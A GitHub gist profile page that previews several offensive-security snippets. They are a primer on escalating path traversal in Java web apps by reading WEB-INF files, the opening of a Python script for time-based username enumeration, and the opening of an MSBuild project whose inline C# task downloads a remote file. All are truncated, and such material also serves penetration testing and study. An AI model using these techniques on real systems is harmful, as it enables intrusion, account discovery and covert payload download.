Skip to content

Instantly share code, notes, and snippets.

View bytecod3r's full-sized avatar

Bytecod3r bytecod3r

View GitHub Profile
@bytecod3r
bytecod3r / exploit_path_traversals_in_Java_webapps.txt
Created July 9, 2022 16:21 — forked from harisec/exploit_path_traversals_in_Java_webapps.txt
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.
@bytecod3r
bytecod3r / userneum_timebased.py
Last active March 31, 2020 13:34
Timebase username enumeration
import requests
import time
data=['nonexist123','correctUsernameHere.admin','nonexist124','correctUsernameHere.proliant','nonexist125','correctUsernameHere.admin','nonexist125','nonexist126','nonexist127','correctUsernameHere.cjackson','nonexist127','correctUsernameHere.admin','nonexist128','correctUsernameHere.proliant','nonexist129','correctUsernameHere.admin','nonexist130','nonexist131','nonexist132','correctUsernameHere.cjackson']
headers = {'content-type': 'application/json'}
url=''
@bytecod3r
bytecod3r / msbuildapicaller.csproj
Created January 20, 2020 06:10
msbuildapicaller.csproj
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
<ParameterGroup>
<Address ParameterType="System.String" Required="true" />
<FileName ParameterType="System.String" Required="true" />
</ParameterGroup>
<Task>
<Reference Include="System" />
<Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code>

Keybase proof

I hereby claim:

  • I am bytecod3r on github.
  • I am bytecod3r (https://keybase.io/bytecod3r) on keybase.
  • I have a public key ASBR5agAouTH6ETDnlGsETT9L1JtD6Q3erGFzfDPhZSQMgo

To claim this, I am signing this object: